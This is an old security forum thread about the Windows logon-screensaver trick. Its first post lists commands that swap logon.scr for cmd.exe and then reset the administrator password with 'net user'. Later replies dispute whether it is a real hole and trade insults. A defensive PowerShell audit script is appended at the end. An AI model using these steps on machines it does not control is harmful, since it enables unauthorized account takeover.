-
September 8th, 2003, 11:41 PM
#1
Another logon.scr Admin Hole + FIX
WOW windows sux.... Lol so many logon holes. Here is another.
I believe that this is only for XP.
I also believe that this is a very well known hole, but I decided to post it for the people who have never heard of it.
How it works.
When your PC is on a logon screen and nothing is done for 10-15 minutes, a LOGON SCREENSAVER is executed. What can happen is a user can replace that LOGON SCREENSAVER with the DOS PROMPT. What this will do is, instead of running the screensaver, it will display the command prompt. Through the prompt they can easily change the ADMIN password and log on under that name.
HOW IT IS DONE
RUN>>COMMAND
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Now all they would have to do is log off the machine, wait 10-15 minutes, then the DOS PROMPT should execute.
Lastly, all they have to do is type "C:\> net user administrator <newpassword>" in the prompt and log in with the new account.
*FIX* Change default permissions on C:\winnt and C:\winnt\system32 and you should be golden.
-
September 8th, 2003, 11:44 PM
#2
Firstly old news,
Secondly it isn't a security hole.
In order to replace logon.scr, you require admin rights, because the default ACL in Windows NT (And 2000, XP etc) only allows administrators and system write access.
If you had admin rights, then you can obtain localsystem privileges easily anyway.
So it just isn't an issue.
Unless you're using fat32. If that is the case however, there are probably easier ways of getting localsystem rights.
Slarty
-
September 8th, 2003, 11:57 PM
#3
Szafran,
With the greatest respect, windows does not suck!
The truth is that the Earth sucks, and that gravity is a myth...........
All operating systems have their flaws, but the worst flaws must be in the humans who find and exploit them?
I guess if you can guarantee 5 minutes, either physical or firewall security should have caught it?
That is where I feel that your security lies...you can only buy time...just like security on an automobile?
just my £ 0.02 worth
-
September 9th, 2003, 12:02 AM
#4
lol, i didn't mean it like that, sorry, i meant it's so much more unsecure than linux. And the reason i posted it was because at my school you do not need ADMIN rights to change files such as LOGON.SCR if you boot with a floppy.
so in response to
Firstly old news,
Secondly it isn't a security hole.
It may not be new but it is still a security hole. And in case you missed my last message: if they boot with a floppy or CD in DOS then it is very possible to alter any file in the windows DIR, including LOGON.SCR.
PS thanx for the NEG Points
-
September 9th, 2003, 12:09 AM
#5
lol, i didn't mean it like that, sorry, i meant it's so much more unsecure than linux.
Just stop talking before I really start to flame you.
I have read a few of your posts now and it is obvious that you are quite new to computers and computer security, so if you'd like to be welcome here I think you would do better _asking_ and not telling.
catch
-
September 9th, 2003, 12:33 AM
#6
actually i'm quite fluent in computers but my posts have been written so that the least fluent user can understand.
and just to let everyone know i just tried this on my other PC and it did work w/ a boot disk. So unless you have bootdisk disabled then you might want to look into this.
-
September 9th, 2003, 12:40 AM
#7
Your other post about any user being able to change the admin password belies your level of fluency.
As for this one, if the system is improperly protected against alternate boots, this screen saver crap is the least of your worries.
catch
-
September 9th, 2003, 12:47 AM
#8
well the admin pass can be easily changed with the NET USER Command
-
September 9th, 2003, 06:05 AM
#9
Originally posted here by Szafran
lol, i didn't mean it like that, sorry, i meant it's so much more unsecure than linux.
I have no problem with your personal feelings towards windows and M$... But with this post however... actually you're wrong, especially considering probably about half of the windows users out there are home users and there are many who know very little or nothing at all about their own computers. One of the main reasons it's such a popular target is because it's so widespread. Also what many people don't realize is linux may not be the biggest target when it comes to virii but what it lacks in that it makes up for with a fair share of exploits...
Originally posted here by Szafran
my posts have been written so that the least fluent user can understand.
Is that an insult or just more excuses on your part?
-
September 9th, 2003, 08:32 AM
#10
It may not be new but it is still a security hole.
No it is not.
And in case you missed my last message: if they boot with a floppy or CD in DOS then it is very possible to alter any file in the windows DIR, including LOGON.SCR.
No, DOS does not understand NTFS, hence will not be able to see the NT partition at all. If you use FAT the system is inherently insecure, AS MICROSOFT FREELY ADMIT and thus don't recommend you use FAT on your system drive.
Of course if you can boot off a CD or floppy full access is easily obtainable anyway, but I won't tell you how because you're a lamer.
PS thanx for the NEG Points
If you want to post up inaccurate duplicate out of date info, you should expect more
Slarty
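A defender-side check for the points made in posts #2 and #10 (write access to logon.scr limited to administrators and SYSTEM on NTFS, nothing enforced on FAT), as an added example that is not part of the thread: this PowerShell audit flags a logon.scr that is really cmd.exe and any extra write-capable ACL entries. The parameter name, the trusted-SID list (including TrustedInstaller) and the use of Get-FileHash (PowerShell 4 or later) are assumptions of this example.

```powershell
# Added audit example (not from the thread). Run in an elevated PowerShell session.
param(
    # Assumption: defaults to the running system's directory; the thread uses C:\winnt\system32.
    [string]$SystemDir = (Join-Path $env:SystemRoot 'System32')
)
$scr = Join-Path $SystemDir 'logon.scr'
$cmd = Join-Path $SystemDir 'cmd.exe'
$findings = @()

# 1. FAT-family volumes store no ACLs, so the permission check below only means something elsewhere.
$root = [System.IO.Path]::GetPathRoot($SystemDir)
$fs = (New-Object System.IO.DriveInfo $root).DriveFormat
if ($fs -match 'FAT') { $findings += "Volume $root is formatted $fs, which has no file ACLs" }

# 2. The swap from post #1: logon.scr carrying cmd.exe's content or version resource.
if (Test-Path $scr) {
    $sameHash = (Get-FileHash $scr -Algorithm SHA256).Hash -eq (Get-FileHash $cmd -Algorithm SHA256).Hash
    $origName = (Get-Item $scr).VersionInfo.OriginalFilename
    if ($sameHash -or $origName -like 'cmd.exe*') {
        $findings += "$scr looks like cmd.exe (hash match: $sameHash, OriginalFilename: $origName)"
    }
}

# 3. Allow ACEs that grant write-type rights to anyone outside the trusted set.
$rights = [System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$writeMask = [int]$rights -bor 0x50000000   # plus GENERIC_WRITE | GENERIC_ALL
$trusted = @(
    'S-1-5-18',       # SYSTEM
    'S-1-5-32-544',   # BUILTIN\Administrators
    'S-1-3-0',        # CREATOR OWNER (inherit-only placeholder)
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller (newer Windows)
)
foreach ($path in $SystemDir, $scr) {
    if (-not (Test-Path $path)) { continue }
    # Ask for SIDs rather than names so the check works on localized systems.
    $rules = (Get-Acl $path).GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -eq 'Allow' -and
            ([int]$ace.FileSystemRights -band $writeMask) -and
            $trusted -notcontains $ace.IdentityReference.Value) {
            $findings += "$path writable by $($ace.IdentityReference.Value) ($($ace.FileSystemRights))"
        }
    }
}

if ($findings) { $findings } else { 'No findings: logon.scr and its directory match the expected state.' }
```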